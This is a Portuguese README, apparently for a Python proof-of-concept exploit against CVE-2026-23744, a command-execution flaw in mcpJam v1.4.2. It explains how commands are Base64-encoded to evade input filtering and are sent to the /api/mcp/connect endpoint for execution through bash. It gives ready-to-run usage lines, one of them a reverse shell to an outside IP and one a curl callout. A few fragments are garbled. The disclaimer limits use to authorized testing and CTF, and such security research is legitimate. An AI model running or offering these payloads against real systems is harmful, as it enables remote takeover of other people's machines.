
cve-2026-23744 exploit em Python
Um exploit de prova de conceito em Python 3 para CVE-2026-23744, uma vulnerabilidade de execução arbitrária de comandos que afeta mcpJam v1.4.2.
Esta utilidade automatiza a entrega do payload codificando transparentemente os comandos em Base64 antes da transmissão, ajudando a contornar validações restritivas de entrada e mecanismos de filtragem de caracteres. O payload é decodificado e executado através de um wrapper /bin/bash no sistema alvo.
Os comandos são automaticamente codificados antes da transmissão, melhorando a confiabilidade ao atacar aplicações que impõem validação rigorosa de entrada ou restrições de caracteres.
Suporta execução arbitrária de comandos, incluindo:
sh, bash, nc, etc.)Exibe:
Isso simplifica a solução de problemas e a validação do exploit.
Suprime avisos de verificação de certificado, permitindo interação com alvos que utilizam certificados SSL autoassinados ou não confiáveis.
Instale a dependência necessária:
pip install requests
python3 exploit.py <url_alvo> "<comando>"
python3 exploit.py http://devhub.com:6274 "curl http://10.10.14.70:8888"
python3 exploit.py http://devhub.com:6274 "sh -i >& /dev/tcp/10.10.14.70/4444 0>&1"
O exploit visa o endpoint /api/mcp/connect criando um objeto serverConfig malicioso.
Em vez de transmitir comandos diretamente, o payload é transformado em uma string codificada em Base64 e executado através do Bash:
"args": [
"-c",
f"echo {base64_payload} | base64 -d | bash"
]
Essa abordagem ajuda a evadir a filtragem no nível da aplicação, garantindo que o payload seja decodificado e executado inteiramente no host alvo.
serverConfig.base64 -d./bin/bash.[!WARNING] Este projeto é fornecido exclusivamente para fins educacionais, avaliações de segurança autorizadas e ambientes Capture The Flag (CTF).
O uso não autorizado contra sistemas para os quais você não possui permissão explícita é ilegal e antiético. O autor não assume nenhuma responsabilidade por qualquer uso indevido, danos ou consequências legais decorrentes do uso deste software.